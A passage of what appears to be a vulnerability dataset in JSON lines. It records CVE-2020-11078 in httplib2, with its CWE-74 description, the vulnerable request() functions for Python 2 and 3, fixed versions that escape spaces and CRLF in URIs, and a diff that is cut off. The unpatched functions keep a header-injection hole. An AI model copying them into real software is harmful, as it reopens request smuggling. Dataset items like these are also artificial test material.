debug.push(gcov)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-11078", "cve_description": "In httplib2 before version 0.18.0, an attacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping. This has been fixed in 0.18.0.", "cwe_info": {"CWE-74": {"name": "Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')", "description": "The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component."}}, "repo": "https://github.com/httplib2/httplib2", "patch_url": ["https://github.com/httplib2/httplib2/commit/a1457cc31f3206cf691d11d2bf34e98865873e9e"], "programing_language": "Python", "vul_func": [{"id": "vul_py_157_1", "commit": "9413ffc", "file_path": "python2/httplib2/__init__.py", "start_line": 1946, "end_line": 2227, "snippet": " def request(\n self,\n uri,\n method=\"GET\",\n body=None,\n headers=None,\n redirections=DEFAULT_MAX_REDIRECTS,\n connection_type=None,\n ):\n \"\"\" Performs a single HTTP request.\n\n The 'uri' is the URI of the HTTP resource and can begin with either\n 'http' or 'https'. The value of 'uri' must be an absolute URI.\n\n The 'method' is the HTTP method to perform, such as GET, POST, DELETE,\n etc. There is no restriction on the methods allowed.\n\n The 'body' is the entity body to be sent with the request. It is a\n string object.\n\n Any extra headers that are to be sent with the request should be\n provided in the 'headers' dictionary.\n\n The maximum number of redirect to follow before raising an\n exception is 'redirections. The default is 5.\n\n The return value is a tuple of (response, content), the first\n being and instance of the 'Response' class, the second being\n a string that contains the response entity body.\n \"\"\"\n conn_key = ''\n\n try:\n if headers is None:\n headers = {}\n else:\n headers = self._normalize_headers(headers)\n\n if \"user-agent\" not in headers:\n headers[\"user-agent\"] = \"Python-httplib2/%s (gzip)\" % __version__\n\n uri = iri2uri(uri)\n\n (scheme, authority, request_uri, defrag_uri) = urlnorm(uri)\n\n proxy_info = self._get_proxy_info(scheme, authority)\n\n conn_key = scheme + \":\" + authority\n conn = self.connections.get(conn_key)\n if conn is None:\n if not connection_type:\n connection_type = SCHEME_TO_CONNECTION[scheme]\n certs = list(self.certificates.iter(authority))\n if scheme == \"https\":\n if certs:\n conn = self.connections[conn_key] = connection_type(\n authority,\n key_file=certs[0][0],\n cert_file=certs[0][1],\n timeout=self.timeout,\n proxy_info=proxy_info,\n ca_certs=self.ca_certs,\n disable_ssl_certificate_validation=self.disable_ssl_certificate_validation,\n ssl_version=self.ssl_version,\n key_password=certs[0][2],\n )\n else:\n conn = self.connections[conn_key] = connection_type(\n authority,\n timeout=self.timeout,\n proxy_info=proxy_info,\n ca_certs=self.ca_certs,\n disable_ssl_certificate_validation=self.disable_ssl_certificate_validation,\n ssl_version=self.ssl_version,\n )\n else:\n conn = self.connections[conn_key] = connection_type(\n authority, timeout=self.timeout, proxy_info=proxy_info\n )\n conn.set_debuglevel(debuglevel)\n\n if \"range\" not in headers and \"accept-encoding\" not in headers:\n headers[\"accept-encoding\"] = \"gzip, deflate\"\n\n info = email.Message.Message()\n cachekey = None\n cached_value = None\n if self.cache:\n cachekey = defrag_uri.encode(\"utf-8\")\n cached_value = self.cache.get(cachekey)\n if cached_value:\n # info = email.message_from_string(cached_value)\n #\n # Need to replace the line above with the kludge below\n # to fix the non-existent bug not fixed in this\n # bug report: http://mail.python.org/pipermail/python-bugs-list/2005-September/030289.html\n try:\n info, content = cached_value.split(\"\\r\\n\\r\\n\", 1)\n feedparser = email.FeedParser.FeedParser()\n feedparser.feed(info)\n info = feedparser.close()\n feedparser._parse = None\n except (IndexError, ValueError):\n self.cache.delete(cachekey)\n cachekey = None\n cached_value = None\n\n if (\n method in self.optimistic_concurrency_methods\n and self.cache\n and \"etag\" in info\n and not self.ignore_etag\n and \"if-match\" not in headers\n ):\n # http://www.w3.org/1999/04/Editing/\n headers[\"if-match\"] = info[\"etag\"]\n\n # https://tools.ietf.org/html/rfc7234\n # A cache MUST invalidate the effective Request URI as well as [...] Location and Content-Location\n # when a non-error status code is received in response to an unsafe request method.\n if self.cache and cachekey and method not in self.safe_methods:\n self.cache.delete(cachekey)\n\n # Check the vary header in the cache to see if this request\n # matches what varies in the cache.\n if method in self.safe_methods and \"vary\" in info:\n vary = info[\"vary\"]\n vary_headers = vary.lower().replace(\" \", \"\").split(\",\")\n for header in vary_headers:\n key = \"-varied-%s\" % header\n value = info[key]\n if headers.get(header, None) != value:\n cached_value = None\n break\n\n if (\n self.cache\n and cached_value\n and (method in self.safe_methods or info[\"status\"] == \"308\")\n and \"range\" not in headers\n ):\n redirect_method = method\n if info[\"status\"] not in (\"307\", \"308\"):\n redirect_method = \"GET\"\n if \"-x-permanent-redirect-url\" in info:\n # Should cached permanent redirects be counted in our redirection count? For now, yes.\n if redirections <= 0:\n raise RedirectLimit(\n \"Redirected more times than rediection_limit allows.\",\n {},\n \"\",\n )\n (response, new_content) = self.request(\n info[\"-x-permanent-redirect-url\"],\n method=redirect_method,\n headers=headers,\n redirections=redirections - 1,\n )\n response.previous = Response(info)\n response.previous.fromcache = True\n else:\n # Determine our course of action:\n # Is the cached entry fresh or stale?\n # Has the client requested a non-cached response?\n #\n # There seems to be three possible answers:\n # 1. [FRESH] Return the cache entry w/o doing a GET\n # 2. [STALE] Do the GET (but add in cache validators if available)\n # 3. [TRANSPARENT] Do a GET w/o any cache validators (Cache-Control: no-cache) on the request\n entry_disposition = _entry_disposition(info, headers)\n\n if entry_disposition == \"FRESH\":\n if not cached_value:\n info[\"status\"] = \"504\"\n content = \"\"\n response = Response(info)\n if cached_value:\n response.fromcache = True\n return (response, content)\n\n if entry_disposition == \"STALE\":\n if (\n \"etag\" in info\n and not self.ignore_etag\n and not \"if-none-match\" in headers\n ):\n headers[\"if-none-match\"] = info[\"etag\"]\n if \"last-modified\" in info and not \"last-modified\" in headers:\n headers[\"if-modified-since\"] = info[\"last-modified\"]\n elif entry_disposition == \"TRANSPARENT\":\n pass\n\n (response, new_content) = self._request(\n conn,\n authority,\n uri,\n request_uri,\n method,\n body,\n headers,\n redirections,\n cachekey,\n )\n\n if response.status == 304 and method == \"GET\":\n # Rewrite the cache entry with the new end-to-end headers\n # Take all headers that are in response\n # and overwrite their values in info.\n # unless they are hop-by-hop, or are listed in the connection header.\n\n for key in _get_end2end_headers(response):\n info[key] = response[key]\n merged_response = Response(info)\n if hasattr(response, \"_stale_digest\"):\n merged_response._stale_digest = response._stale_digest\n _updateCache(\n headers, merged_response, content, self.cache, cachekey\n )\n response = merged_response\n response.status = 200\n response.fromcache = True\n\n elif response.status == 200:\n content = new_content\n else:\n self.cache.delete(cachekey)\n content = new_content\n else:\n cc = _parse_cache_control(headers)\n if \"only-if-cached\" in cc:\n info[\"status\"] = \"504\"\n response = Response(info)\n content = \"\"\n else:\n (response, content) = self._request(\n conn,\n authority,\n uri,\n request_uri,\n method,\n body,\n headers,\n redirections,\n cachekey,\n )\n except Exception as e:\n is_timeout = isinstance(e, socket.timeout)\n if is_timeout:\n conn = self.connections.pop(conn_key, None)\n if conn:\n conn.close()\n\n if self.force_exception_to_status_code:\n if isinstance(e, HttpLib2ErrorWithResponse):\n response = e.response\n content = e.content\n response.status = 500\n response.reason = str(e)\n elif is_timeout:\n content = \"Request Timeout\"\n response = Response(\n {\n \"content-type\": \"text/plain\",\n \"status\": \"408\",\n \"content-length\": len(content),\n }\n )\n response.reason = \"Request Timeout\"\n else:\n content = str(e)\n response = Response(\n {\n \"content-type\": \"text/plain\",\n \"status\": \"400\",\n \"content-length\": len(content),\n }\n )\n response.reason = \"Bad Request\"\n else:\n raise\n\n return (response, content)"}, {"id": "vul_py_157_2", "commit": "9413ffc", "file_path": "python3/httplib2/__init__.py", "start_line": 1752, "end_line": 2029, "snippet": " def request(\n self,\n uri,\n method=\"GET\",\n body=None,\n headers=None,\n redirections=DEFAULT_MAX_REDIRECTS,\n connection_type=None,\n ):\n \"\"\" Performs a single HTTP request.\nThe 'uri' is the URI of the HTTP resource and can begin\nwith either 'http' or 'https'. The value of 'uri' must be an absolute URI.\n\nThe 'method' is the HTTP method to perform, such as GET, POST, DELETE, etc.\nThere is no restriction on the methods allowed.\n\nThe 'body' is the entity body to be sent with the request. It is a string\nobject.\n\nAny extra headers that are to be sent with the request should be provided in the\n'headers' dictionary.\n\nThe maximum number of redirect to follow before raising an\nexception is 'redirections. The default is 5.\n\nThe return value is a tuple of (response, content), the first\nbeing and instance of the 'Response' class, the second being\na string that contains the response entity body.\n \"\"\"\n conn_key = ''\n\n try:\n if headers is None:\n headers = {}\n else:\n headers = self._normalize_headers(headers)\n\n if \"user-agent\" not in headers:\n headers[\"user-agent\"] = \"Python-httplib2/%s (gzip)\" % __version__\n\n uri = iri2uri(uri)\n\n (scheme, authority, request_uri, defrag_uri) = urlnorm(uri)\n\n conn_key = scheme + \":\" + authority\n conn = self.connections.get(conn_key)\n if conn is None:\n if not connection_type:\n connection_type = SCHEME_TO_CONNECTION[scheme]\n certs = list(self.certificates.iter(authority))\n if issubclass(connection_type, HTTPSConnectionWithTimeout):\n if certs:\n conn = self.connections[conn_key] = connection_type(\n authority,\n key_file=certs[0][0],\n cert_file=certs[0][1],\n timeout=self.timeout,\n proxy_info=self.proxy_info,\n ca_certs=self.ca_certs,\n disable_ssl_certificate_validation=self.disable_ssl_certificate_validation,\n tls_maximum_version=self.tls_maximum_version,\n tls_minimum_version=self.tls_minimum_version,\n key_password=certs[0][2],\n )\n else:\n conn = self.connections[conn_key] = connection_type(\n authority,\n timeout=self.timeout,\n proxy_info=self.proxy_info,\n ca_certs=self.ca_certs,\n disable_ssl_certificate_validation=self.disable_ssl_certificate_validation,\n tls_maximum_version=self.tls_maximum_version,\n tls_minimum_version=self.tls_minimum_version,\n )\n else:\n conn = self.connections[conn_key] = connection_type(\n authority, timeout=self.timeout, proxy_info=self.proxy_info\n )\n conn.set_debuglevel(debuglevel)\n\n if \"range\" not in headers and \"accept-encoding\" not in headers:\n headers[\"accept-encoding\"] = \"gzip, deflate\"\n\n info = email.message.Message()\n cachekey = None\n cached_value = None\n if self.cache:\n cachekey = defrag_uri\n cached_value = self.cache.get(cachekey)\n if cached_value:\n try:\n info, content = cached_value.split(b\"\\r\\n\\r\\n\", 1)\n info = email.message_from_bytes(info)\n for k, v in info.items():\n if v.startswith(\"=?\") and v.endswith(\"?=\"):\n info.replace_header(\n k, str(*email.header.decode_header(v)[0])\n )\n except (IndexError, ValueError):\n self.cache.delete(cachekey)\n cachekey = None\n cached_value = None\n\n if (\n method in self.optimistic_concurrency_methods\n and self.cache\n and \"etag\" in info\n and not self.ignore_etag\n and \"if-match\" not in headers\n ):\n # http://www.w3.org/1999/04/Editing/\n headers[\"if-match\"] = info[\"etag\"]\n\n # https://tools.ietf.org/html/rfc7234\n # A cache MUST invalidate the effective Request URI as well as [...] Location and Content-Location\n # when a non-error status code is received in response to an unsafe request method.\n if self.cache and cachekey and method not in self.safe_methods:\n self.cache.delete(cachekey)\n\n # Check the vary header in the cache to see if this request\n # matches what varies in the cache.\n if method in self.safe_methods and \"vary\" in info:\n vary = info[\"vary\"]\n vary_headers = vary.lower().replace(\" \", \"\").split(\",\")\n for header in vary_headers:\n key = \"-varied-%s\" % header\n value = info[key]\n if headers.get(header, None) != value:\n cached_value = None\n break\n\n if (\n self.cache\n and cached_value\n and (method in self.safe_methods or info[\"status\"] == \"308\")\n and \"range\" not in headers\n ):\n redirect_method = method\n if info[\"status\"] not in (\"307\", \"308\"):\n redirect_method = \"GET\"\n if \"-x-permanent-redirect-url\" in info:\n # Should cached permanent redirects be counted in our redirection count? For now, yes.\n if redirections <= 0:\n raise RedirectLimit(\n \"Redirected more times than redirection_limit allows.\",\n {},\n \"\",\n )\n (response, new_content) = self.request(\n info[\"-x-permanent-redirect-url\"],\n method=redirect_method,\n headers=headers,\n redirections=redirections - 1,\n )\n response.previous = Response(info)\n response.previous.fromcache = True\n else:\n # Determine our course of action:\n # Is the cached entry fresh or stale?\n # Has the client requested a non-cached response?\n #\n # There seems to be three possible answers:\n # 1. [FRESH] Return the cache entry w/o doing a GET\n # 2. [STALE] Do the GET (but add in cache validators if available)\n # 3. [TRANSPARENT] Do a GET w/o any cache validators (Cache-Control: no-cache) on the request\n entry_disposition = _entry_disposition(info, headers)\n\n if entry_disposition == \"FRESH\":\n if not cached_value:\n info[\"status\"] = \"504\"\n content = b\"\"\n response = Response(info)\n if cached_value:\n response.fromcache = True\n return (response, content)\n\n if entry_disposition == \"STALE\":\n if (\n \"etag\" in info\n and not self.ignore_etag\n and not \"if-none-match\" in headers\n ):\n headers[\"if-none-match\"] = info[\"etag\"]\n if \"last-modified\" in info and not \"last-modified\" in headers:\n headers[\"if-modified-since\"] = info[\"last-modified\"]\n elif entry_disposition == \"TRANSPARENT\":\n pass\n\n (response, new_content) = self._request(\n conn,\n authority,\n uri,\n request_uri,\n method,\n body,\n headers,\n redirections,\n cachekey,\n )\n\n if response.status == 304 and method == \"GET\":\n # Rewrite the cache entry with the new end-to-end headers\n # Take all headers that are in response\n # and overwrite their values in info.\n # unless they are hop-by-hop, or are listed in the connection header.\n\n for key in _get_end2end_headers(response):\n info[key] = response[key]\n merged_response = Response(info)\n if hasattr(response, \"_stale_digest\"):\n merged_response._stale_digest = response._stale_digest\n _updateCache(\n headers, merged_response, content, self.cache, cachekey\n )\n response = merged_response\n response.status = 200\n response.fromcache = True\n\n elif response.status == 200:\n content = new_content\n else:\n self.cache.delete(cachekey)\n content = new_content\n else:\n cc = _parse_cache_control(headers)\n if \"only-if-cached\" in cc:\n info[\"status\"] = \"504\"\n response = Response(info)\n content = b\"\"\n else:\n (response, content) = self._request(\n conn,\n authority,\n uri,\n request_uri,\n method,\n body,\n headers,\n redirections,\n cachekey,\n )\n except Exception as e:\n is_timeout = isinstance(e, socket.timeout)\n if is_timeout:\n conn = self.connections.pop(conn_key, None)\n if conn:\n conn.close()\n\n if self.force_exception_to_status_code:\n if isinstance(e, HttpLib2ErrorWithResponse):\n response = e.response\n content = e.content\n response.status = 500\n response.reason = str(e)\n elif isinstance(e, socket.timeout):\n content = b\"Request Timeout\"\n response = Response(\n {\n \"content-type\": \"text/plain\",\n \"status\": \"408\",\n \"content-length\": len(content),\n }\n )\n response.reason = \"Request Timeout\"\n else:\n content = str(e).encode(\"utf-8\")\n response = Response(\n {\n \"content-type\": \"text/plain\",\n \"status\": \"400\",\n \"content-length\": len(content),\n }\n )\n response.reason = \"Bad Request\"\n else:\n raise\n\n return (response, content)"}], "fix_func": [{"id": "fix_py_157_1", "commit": "a1457cc", "file_path": "python2/httplib2/__init__.py", "start_line": 1946, "end_line": 2230, "snippet": " def request(\n self,\n uri,\n method=\"GET\",\n body=None,\n headers=None,\n redirections=DEFAULT_MAX_REDIRECTS,\n connection_type=None,\n ):\n \"\"\" Performs a single HTTP request.\n\n The 'uri' is the URI of the HTTP resource and can begin with either\n 'http' or 'https'. The value of 'uri' must be an absolute URI.\n\n The 'method' is the HTTP method to perform, such as GET, POST, DELETE,\n etc. There is no restriction on the methods allowed.\n\n The 'body' is the entity body to be sent with the request. It is a\n string object.\n\n Any extra headers that are to be sent with the request should be\n provided in the 'headers' dictionary.\n\n The maximum number of redirect to follow before raising an\n exception is 'redirections. The default is 5.\n\n The return value is a tuple of (response, content), the first\n being and instance of the 'Response' class, the second being\n a string that contains the response entity body.\n \"\"\"\n conn_key = ''\n\n try:\n if headers is None:\n headers = {}\n else:\n headers = self._normalize_headers(headers)\n\n if \"user-agent\" not in headers:\n headers[\"user-agent\"] = \"Python-httplib2/%s (gzip)\" % __version__\n\n uri = iri2uri(uri)\n # Prevent CWE-75 space injection to manipulate request via part of uri.\n # Prevent CWE-93 CRLF injection to modify headers via part of uri.\n uri = uri.replace(\" \", \"%20\").replace(\"\\r\", \"%0D\").replace(\"\\n\", \"%0A\")\n\n (scheme, authority, request_uri, defrag_uri) = urlnorm(uri)\n\n proxy_info = self._get_proxy_info(scheme, authority)\n\n conn_key = scheme + \":\" + authority\n conn = self.connections.get(conn_key)\n if conn is None:\n if not connection_type:\n connection_type = SCHEME_TO_CONNECTION[scheme]\n certs = list(self.certificates.iter(authority))\n if scheme == \"https\":\n if certs:\n conn = self.connections[conn_key] = connection_type(\n authority,\n key_file=certs[0][0],\n cert_file=certs[0][1],\n timeout=self.timeout,\n proxy_info=proxy_info,\n ca_certs=self.ca_certs,\n disable_ssl_certificate_validation=self.disable_ssl_certificate_validation,\n ssl_version=self.ssl_version,\n key_password=certs[0][2],\n )\n else:\n conn = self.connections[conn_key] = connection_type(\n authority,\n timeout=self.timeout,\n proxy_info=proxy_info,\n ca_certs=self.ca_certs,\n disable_ssl_certificate_validation=self.disable_ssl_certificate_validation,\n ssl_version=self.ssl_version,\n )\n else:\n conn = self.connections[conn_key] = connection_type(\n authority, timeout=self.timeout, proxy_info=proxy_info\n )\n conn.set_debuglevel(debuglevel)\n\n if \"range\" not in headers and \"accept-encoding\" not in headers:\n headers[\"accept-encoding\"] = \"gzip, deflate\"\n\n info = email.Message.Message()\n cachekey = None\n cached_value = None\n if self.cache:\n cachekey = defrag_uri.encode(\"utf-8\")\n cached_value = self.cache.get(cachekey)\n if cached_value:\n # info = email.message_from_string(cached_value)\n #\n # Need to replace the line above with the kludge below\n # to fix the non-existent bug not fixed in this\n # bug report: http://mail.python.org/pipermail/python-bugs-list/2005-September/030289.html\n try:\n info, content = cached_value.split(\"\\r\\n\\r\\n\", 1)\n feedparser = email.FeedParser.FeedParser()\n feedparser.feed(info)\n info = feedparser.close()\n feedparser._parse = None\n except (IndexError, ValueError):\n self.cache.delete(cachekey)\n cachekey = None\n cached_value = None\n\n if (\n method in self.optimistic_concurrency_methods\n and self.cache\n and \"etag\" in info\n and not self.ignore_etag\n and \"if-match\" not in headers\n ):\n # http://www.w3.org/1999/04/Editing/\n headers[\"if-match\"] = info[\"etag\"]\n\n # https://tools.ietf.org/html/rfc7234\n # A cache MUST invalidate the effective Request URI as well as [...] Location and Content-Location\n # when a non-error status code is received in response to an unsafe request method.\n if self.cache and cachekey and method not in self.safe_methods:\n self.cache.delete(cachekey)\n\n # Check the vary header in the cache to see if this request\n # matches what varies in the cache.\n if method in self.safe_methods and \"vary\" in info:\n vary = info[\"vary\"]\n vary_headers = vary.lower().replace(\" \", \"\").split(\",\")\n for header in vary_headers:\n key = \"-varied-%s\" % header\n value = info[key]\n if headers.get(header, None) != value:\n cached_value = None\n break\n\n if (\n self.cache\n and cached_value\n and (method in self.safe_methods or info[\"status\"] == \"308\")\n and \"range\" not in headers\n ):\n redirect_method = method\n if info[\"status\"] not in (\"307\", \"308\"):\n redirect_method = \"GET\"\n if \"-x-permanent-redirect-url\" in info:\n # Should cached permanent redirects be counted in our redirection count? For now, yes.\n if redirections <= 0:\n raise RedirectLimit(\n \"Redirected more times than rediection_limit allows.\",\n {},\n \"\",\n )\n (response, new_content) = self.request(\n info[\"-x-permanent-redirect-url\"],\n method=redirect_method,\n headers=headers,\n redirections=redirections - 1,\n )\n response.previous = Response(info)\n response.previous.fromcache = True\n else:\n # Determine our course of action:\n # Is the cached entry fresh or stale?\n # Has the client requested a non-cached response?\n #\n # There seems to be three possible answers:\n # 1. [FRESH] Return the cache entry w/o doing a GET\n # 2. [STALE] Do the GET (but add in cache validators if available)\n # 3. [TRANSPARENT] Do a GET w/o any cache validators (Cache-Control: no-cache) on the request\n entry_disposition = _entry_disposition(info, headers)\n\n if entry_disposition == \"FRESH\":\n if not cached_value:\n info[\"status\"] = \"504\"\n content = \"\"\n response = Response(info)\n if cached_value:\n response.fromcache = True\n return (response, content)\n\n if entry_disposition == \"STALE\":\n if (\n \"etag\" in info\n and not self.ignore_etag\n and not \"if-none-match\" in headers\n ):\n headers[\"if-none-match\"] = info[\"etag\"]\n if \"last-modified\" in info and not \"last-modified\" in headers:\n headers[\"if-modified-since\"] = info[\"last-modified\"]\n elif entry_disposition == \"TRANSPARENT\":\n pass\n\n (response, new_content) = self._request(\n conn,\n authority,\n uri,\n request_uri,\n method,\n body,\n headers,\n redirections,\n cachekey,\n )\n\n if response.status == 304 and method == \"GET\":\n # Rewrite the cache entry with the new end-to-end headers\n # Take all headers that are in response\n # and overwrite their values in info.\n # unless they are hop-by-hop, or are listed in the connection header.\n\n for key in _get_end2end_headers(response):\n info[key] = response[key]\n merged_response = Response(info)\n if hasattr(response, \"_stale_digest\"):\n merged_response._stale_digest = response._stale_digest\n _updateCache(\n headers, merged_response, content, self.cache, cachekey\n )\n response = merged_response\n response.status = 200\n response.fromcache = True\n\n elif response.status == 200:\n content = new_content\n else:\n self.cache.delete(cachekey)\n content = new_content\n else:\n cc = _parse_cache_control(headers)\n if \"only-if-cached\" in cc:\n info[\"status\"] = \"504\"\n response = Response(info)\n content = \"\"\n else:\n (response, content) = self._request(\n conn,\n authority,\n uri,\n request_uri,\n method,\n body,\n headers,\n redirections,\n cachekey,\n )\n except Exception as e:\n is_timeout = isinstance(e, socket.timeout)\n if is_timeout:\n conn = self.connections.pop(conn_key, None)\n if conn:\n conn.close()\n\n if self.force_exception_to_status_code:\n if isinstance(e, HttpLib2ErrorWithResponse):\n response = e.response\n content = e.content\n response.status = 500\n response.reason = str(e)\n elif is_timeout:\n content = \"Request Timeout\"\n response = Response(\n {\n \"content-type\": \"text/plain\",\n \"status\": \"408\",\n \"content-length\": len(content),\n }\n )\n response.reason = \"Request Timeout\"\n else:\n content = str(e)\n response = Response(\n {\n \"content-type\": \"text/plain\",\n \"status\": \"400\",\n \"content-length\": len(content),\n }\n )\n response.reason = \"Bad Request\"\n else:\n raise\n\n return (response, content)"}, {"id": "fix_py_157_2", "commit": "a1457cc", "file_path": "python3/httplib2/__init__.py", "start_line": 1752, "end_line": 2032, "snippet": " def request(\n self,\n uri,\n method=\"GET\",\n body=None,\n headers=None,\n redirections=DEFAULT_MAX_REDIRECTS,\n connection_type=None,\n ):\n \"\"\" Performs a single HTTP request.\nThe 'uri' is the URI of the HTTP resource and can begin\nwith either 'http' or 'https'. The value of 'uri' must be an absolute URI.\n\nThe 'method' is the HTTP method to perform, such as GET, POST, DELETE, etc.\nThere is no restriction on the methods allowed.\n\nThe 'body' is the entity body to be sent with the request. It is a string\nobject.\n\nAny extra headers that are to be sent with the request should be provided in the\n'headers' dictionary.\n\nThe maximum number of redirect to follow before raising an\nexception is 'redirections. The default is 5.\n\nThe return value is a tuple of (response, content), the first\nbeing and instance of the 'Response' class, the second being\na string that contains the response entity body.\n \"\"\"\n conn_key = ''\n\n try:\n if headers is None:\n headers = {}\n else:\n headers = self._normalize_headers(headers)\n\n if \"user-agent\" not in headers:\n headers[\"user-agent\"] = \"Python-httplib2/%s (gzip)\" % __version__\n\n uri = iri2uri(uri)\n # Prevent CWE-75 space injection to manipulate request via part of uri.\n # Prevent CWE-93 CRLF injection to modify headers via part of uri.\n uri = uri.replace(\" \", \"%20\").replace(\"\\r\", \"%0D\").replace(\"\\n\", \"%0A\")\n\n (scheme, authority, request_uri, defrag_uri) = urlnorm(uri)\n\n conn_key = scheme + \":\" + authority\n conn = self.connections.get(conn_key)\n if conn is None:\n if not connection_type:\n connection_type = SCHEME_TO_CONNECTION[scheme]\n certs = list(self.certificates.iter(authority))\n if issubclass(connection_type, HTTPSConnectionWithTimeout):\n if certs:\n conn = self.connections[conn_key] = connection_type(\n authority,\n key_file=certs[0][0],\n cert_file=certs[0][1],\n timeout=self.timeout,\n proxy_info=self.proxy_info,\n ca_certs=self.ca_certs,\n disable_ssl_certificate_validation=self.disable_ssl_certificate_validation,\n tls_maximum_version=self.tls_maximum_version,\n tls_minimum_version=self.tls_minimum_version,\n key_password=certs[0][2],\n )\n else:\n conn = self.connections[conn_key] = connection_type(\n authority,\n timeout=self.timeout,\n proxy_info=self.proxy_info,\n ca_certs=self.ca_certs,\n disable_ssl_certificate_validation=self.disable_ssl_certificate_validation,\n tls_maximum_version=self.tls_maximum_version,\n tls_minimum_version=self.tls_minimum_version,\n )\n else:\n conn = self.connections[conn_key] = connection_type(\n authority, timeout=self.timeout, proxy_info=self.proxy_info\n )\n conn.set_debuglevel(debuglevel)\n\n if \"range\" not in headers and \"accept-encoding\" not in headers:\n headers[\"accept-encoding\"] = \"gzip, deflate\"\n\n info = email.message.Message()\n cachekey = None\n cached_value = None\n if self.cache:\n cachekey = defrag_uri\n cached_value = self.cache.get(cachekey)\n if cached_value:\n try:\n info, content = cached_value.split(b\"\\r\\n\\r\\n\", 1)\n info = email.message_from_bytes(info)\n for k, v in info.items():\n if v.startswith(\"=?\") and v.endswith(\"?=\"):\n info.replace_header(\n k, str(*email.header.decode_header(v)[0])\n )\n except (IndexError, ValueError):\n self.cache.delete(cachekey)\n cachekey = None\n cached_value = None\n\n if (\n method in self.optimistic_concurrency_methods\n and self.cache\n and \"etag\" in info\n and not self.ignore_etag\n and \"if-match\" not in headers\n ):\n # http://www.w3.org/1999/04/Editing/\n headers[\"if-match\"] = info[\"etag\"]\n\n # https://tools.ietf.org/html/rfc7234\n # A cache MUST invalidate the effective Request URI as well as [...] Location and Content-Location\n # when a non-error status code is received in response to an unsafe request method.\n if self.cache and cachekey and method not in self.safe_methods:\n self.cache.delete(cachekey)\n\n # Check the vary header in the cache to see if this request\n # matches what varies in the cache.\n if method in self.safe_methods and \"vary\" in info:\n vary = info[\"vary\"]\n vary_headers = vary.lower().replace(\" \", \"\").split(\",\")\n for header in vary_headers:\n key = \"-varied-%s\" % header\n value = info[key]\n if headers.get(header, None) != value:\n cached_value = None\n break\n\n if (\n self.cache\n and cached_value\n and (method in self.safe_methods or info[\"status\"] == \"308\")\n and \"range\" not in headers\n ):\n redirect_method = method\n if info[\"status\"] not in (\"307\", \"308\"):\n redirect_method = \"GET\"\n if \"-x-permanent-redirect-url\" in info:\n # Should cached permanent redirects be counted in our redirection count? For now, yes.\n if redirections <= 0:\n raise RedirectLimit(\n \"Redirected more times than redirection_limit allows.\",\n {},\n \"\",\n )\n (response, new_content) = self.request(\n info[\"-x-permanent-redirect-url\"],\n method=redirect_method,\n headers=headers,\n redirections=redirections - 1,\n )\n response.previous = Response(info)\n response.previous.fromcache = True\n else:\n # Determine our course of action:\n # Is the cached entry fresh or stale?\n # Has the client requested a non-cached response?\n #\n # There seems to be three possible answers:\n # 1. [FRESH] Return the cache entry w/o doing a GET\n # 2. [STALE] Do the GET (but add in cache validators if available)\n # 3. [TRANSPARENT] Do a GET w/o any cache validators (Cache-Control: no-cache) on the request\n entry_disposition = _entry_disposition(info, headers)\n\n if entry_disposition == \"FRESH\":\n if not cached_value:\n info[\"status\"] = \"504\"\n content = b\"\"\n response = Response(info)\n if cached_value:\n response.fromcache = True\n return (response, content)\n\n if entry_disposition == \"STALE\":\n if (\n \"etag\" in info\n and not self.ignore_etag\n and not \"if-none-match\" in headers\n ):\n headers[\"if-none-match\"] = info[\"etag\"]\n if \"last-modified\" in info and not \"last-modified\" in headers:\n headers[\"if-modified-since\"] = info[\"last-modified\"]\n elif entry_disposition == \"TRANSPARENT\":\n pass\n\n (response, new_content) = self._request(\n conn,\n authority,\n uri,\n request_uri,\n method,\n body,\n headers,\n redirections,\n cachekey,\n )\n\n if response.status == 304 and method == \"GET\":\n # Rewrite the cache entry with the new end-to-end headers\n # Take all headers that are in response\n # and overwrite their values in info.\n # unless they are hop-by-hop, or are listed in the connection header.\n\n for key in _get_end2end_headers(response):\n info[key] = response[key]\n merged_response = Response(info)\n if hasattr(response, \"_stale_digest\"):\n merged_response._stale_digest = response._stale_digest\n _updateCache(\n headers, merged_response, content, self.cache, cachekey\n )\n response = merged_response\n response.status = 200\n response.fromcache = True\n\n elif response.status == 200:\n content = new_content\n else:\n self.cache.delete(cachekey)\n content = new_content\n else:\n cc = _parse_cache_control(headers)\n if \"only-if-cached\" in cc:\n info[\"status\"] = \"504\"\n response = Response(info)\n content = b\"\"\n else:\n (response, content) = self._request(\n conn,\n authority,\n uri,\n request_uri,\n method,\n body,\n headers,\n redirections,\n cachekey,\n )\n except Exception as e:\n is_timeout = isinstance(e, socket.timeout)\n if is_timeout:\n conn = self.connections.pop(conn_key, None)\n if conn:\n conn.close()\n\n if self.force_exception_to_status_code:\n if isinstance(e, HttpLib2ErrorWithResponse):\n response = e.response\n content = e.content\n response.status = 500\n response.reason = str(e)\n elif isinstance(e, socket.timeout):\n content = b\"Request Timeout\"\n response = Response(\n {\n \"content-type\": \"text/plain\",\n \"status\": \"408\",\n \"content-length\": len(content),\n }\n )\n response.reason = \"Request Timeout\"\n else:\n content = str(e).encode(\"utf-8\")\n response = Response(\n {\n \"content-type\": \"text/plain\",\n \"status\": \"400\",\n \"content-length\": len(content),\n }\n )\n response.reason = \"Bad Request\"\n else:\n raise\n\n return (response, content)"}], "vul_patch": "--- a/python2/httplib2/__init__.py\n+++ b/python2/httplib2/__init__.py\n@@ -40,6 +40,9 @@\n headers[\"user-agent\"] = \"Python-httplib2/%s (gzip)\" % __version__\n \n uri = iri2uri(uri)\n+ # Prevent CWE-75 space injection to manipulate request via part of uri.\n+ # Prevent CWE-93 CRLF injection to modify headers via part of uri.\n+ uri = uri.replace(\" \", \"%20\").replace(\"\\r\", \"%0D\").replace(\"\\n\", \"%0A\")\n \n (scheme, authority, request_uri, defrag_uri) = urlnorm(uri)\n \n\n--- a/python3/httplib2/__init__.py\n+++ b/python3/httplib2/__init__.py\n@@ -39,6 +39,9 @@\n headers[\"user-agent\"] = \"Python-httplib2/%s (gzip)\" % __version__\n \n uri = iri2uri(uri)\n+ # Prevent CWE-75 space injection to manipulate request via part of uri.\n+ # Prevent CWE-93 CRLF injection to modify headers via part of uri.\n+ uri = uri.replace(\" \", 